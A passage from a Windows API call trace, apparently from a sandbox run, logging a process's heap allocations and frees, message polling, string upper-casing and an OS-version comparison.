hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.439] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.439] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0244.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0244.440] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0244.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0244.440] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0244.441] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0244.441] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.441] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.442] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0244.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0244.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.443] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.444] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0244.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.445] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0244.447] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0244.447] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0244.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.447] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0244.448] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0244.448] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0244.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0244.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree 